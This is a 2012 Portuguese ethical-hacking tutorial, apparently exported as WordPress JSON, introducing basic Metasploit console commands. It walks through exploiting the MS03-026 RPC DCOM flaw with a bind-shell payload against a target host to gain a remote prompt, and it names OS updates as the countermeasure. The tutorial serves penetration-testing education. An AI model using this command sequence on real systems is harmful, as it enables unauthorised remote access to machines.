{"id":2958,"date":"2012-05-18T18:29:29","date_gmt":"2012-05-18T18:29:29","guid":{"rendered":"http:\/\/www.ethicalhacker.com.br\/site\/?p=2958"},"modified":"2019-06-06T16:50:29","modified_gmt":"2019-06-06T19:50:29","slug":"metasploit-basico-2","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2012\/05\/exploits\/metasploit-basico-2\/","title":{"rendered":"Metasploit B\u00e1sico"},"content":{"rendered":"<p>A seguir alguns comandos b\u00e1sicos do potente Framework para testes de vulnerabilidades, o Metasploit.<\/p>\n<p>Acessando o Framework:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2924\" title=\"m1\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png\"  alt=\"\" width=\"536\" height=\"46\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png 766w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13-300x25.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13-150x12.png 150w\" sizes=\"auto, (max-width: 536px) 100vw, 536px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Executando o &#8220;.\/msfconsole&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2922\" title=\"m2\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png\"  alt=\"\" width=\"540\" height=\"186\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png 771w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2-300x103.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2-150x51.png 150w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Buscando ajuda com o comando, &#8220;help&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2926\" title=\"m3\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png\"  alt=\"\" width=\"547\" height=\"200\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png 781w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3-300x109.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3-150x54.png 150w\" sizes=\"auto, (max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Visualizando Exploits dispon\u00edveis na base com o comando, &#8220;show exploits&#8221; :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/x.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-3985\" title=\"x\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/x.png\"  alt=\"\" width=\"547\" height=\"200\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Utilizando o comando &#8220;search&#8221; para pesquisar determinado exploit:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2931\" title=\"m5\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png\"  alt=\"\" width=\"549\" height=\"141\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png 784w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5-300x76.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5-150x38.png 150w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Obtendo informa\u00e7\u00f5es sobre o exploit com o comando, &#8220;info&#8221; :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2933\" title=\"m6\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png\"  alt=\"\" width=\"545\" height=\"324\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png 778w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6-300x178.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6-150x89.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Explorando uma m\u00e1quina vulner\u00e1vel a RPC DCOM com o comando, &#8220;use windows\/dcerpc\/ms03_026_dcom :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2936\" title=\"m7\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png\"  alt=\"\" width=\"547\" height=\"55\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png 782w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7-300x30.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7-150x15.png 150w\" sizes=\"auto, (max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Verificando quem \u00e9 vulner\u00e1vel com o comando, &#8220;show targets&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2939\" title=\"m8\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png\"  alt=\"\" width=\"548\" height=\"118\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png 783w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81-300x64.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81-150x32.png 150w\" sizes=\"auto, (max-width: 548px) 100vw, 548px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Verificando payloads dispon\u00edveis para o ataque com o comando, &#8220;show payloads&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2941\" title=\"m9\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png\"  alt=\"\" width=\"550\" height=\"216\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png 786w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9-300x117.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9-150x58.png 150w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Setando um payload para o ataque com o comando, &#8220;set payload generic\/shell_bind_tcp&#8221; :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2943\" title=\"m10\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png\"  alt=\"\" width=\"548\" height=\"44\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png 783w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10-300x24.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10-150x12.png 150w\" sizes=\"auto, (max-width: 548px) 100vw, 548px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Checando op\u00e7\u00f5es de uso com o comando, &#8220;show options&#8221; :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2945\" title=\"m11\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png\"  alt=\"\" width=\"545\" height=\"251\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png 779w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111-300x138.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111-150x69.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Setando o alvo com o comando, &#8220;set RHOST ip_do_alvo&#8221; :<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2946\" title=\"m12\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png\"  alt=\"\" width=\"543\" height=\"39\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png 776w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121-300x21.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121-150x10.png 150w\" sizes=\"auto, (max-width: 543px) 100vw, 543px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Executando o Exploit e ganhando o prompt com o comando, &#8220;exploit&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2947\" title=\"m13\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png\"  alt=\"\" width=\"545\" height=\"145\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png 779w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131-300x79.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131-150x39.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tuxme.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-3476\" title=\"tuxme\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tuxme.png\"  alt=\"\" width=\"108\" height=\"92\" \/><\/a><\/p>\n<p><span style=\"color: #ff0000;\"><strong>Contramedidas<\/strong><\/span> : Atualiza\u00e7\u00e3o do Sistema Operacional.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>At\u00e9 a pr\u00f3xima !<\/p>\n<p>&nbsp;<\/p>\n\r\n\t\t<div class='author-shortcodes'>\r\n\t\t\t<div class='author-inner'>\r\n\t\t\t\t<div class='author-image'>\r\n\t\t\t<img src='https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/186048_100001838322519_1550894_n-11668_57x57.jpg' alt='' \/>\r\n\t\t\t<div class='author-overlay'><\/div>\r\n\t\t<\/div> <!-- .author-image --> \r\n\t\t<div class='author-info'>\r\n\t\t\t<p>Autor:\u00a0<strong>S\u00edlvio C\u00e9sar Roxo Giavaroto<\/strong><\/p>\n<p>\u00c9 MBA Especialista em Gest\u00e3o de Seguran\u00e7a da Informa\u00e7\u00e3o,\nTecn\u00f3logo em Redes de Computadores, C|EH Certified Ethical Hacker,\natua como Pentest e Analista de Seguran\u00e7a em Servidores Linux no\nGoverno do Estado de S\u00e3o Paulo, Professor Universit\u00e1rio , \u00a0Instrutor\nC|EH e C|HFI.<\/p>\n<p><em>\u00a0<\/em>\r\n\t\t<\/div> <!-- .author-info --><\/p>\r\n\t\t\t<\/div> <!-- .author-inner -->\r\n\t\t<\/div> <!-- .author-shortcodes -->\n","protected":false},"excerpt":{"rendered":"<p>A seguir alguns comandos b\u00e1sicos do potente Framework para testes de vulnerabilidades, o Metasploit. Acessando o Framework: &nbsp; &nbsp; &nbsp; Executando o &#8220;.\/msfconsole&#8221;: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Buscando ajuda com o comando, &#8220;help&#8221;: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Visualizando Exploits dispon\u00edveis na base com o comando, &#8220;show [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3315,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,101],"tags":[],"class_list":["post-2958","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-tutorial-backtrack"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=2958"}],"version-history":[{"count":18,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958\/revisions"}],"predecessor-version":[{"id":10220,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958\/revisions\/10220"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/3315"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=2958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=2958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=2958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}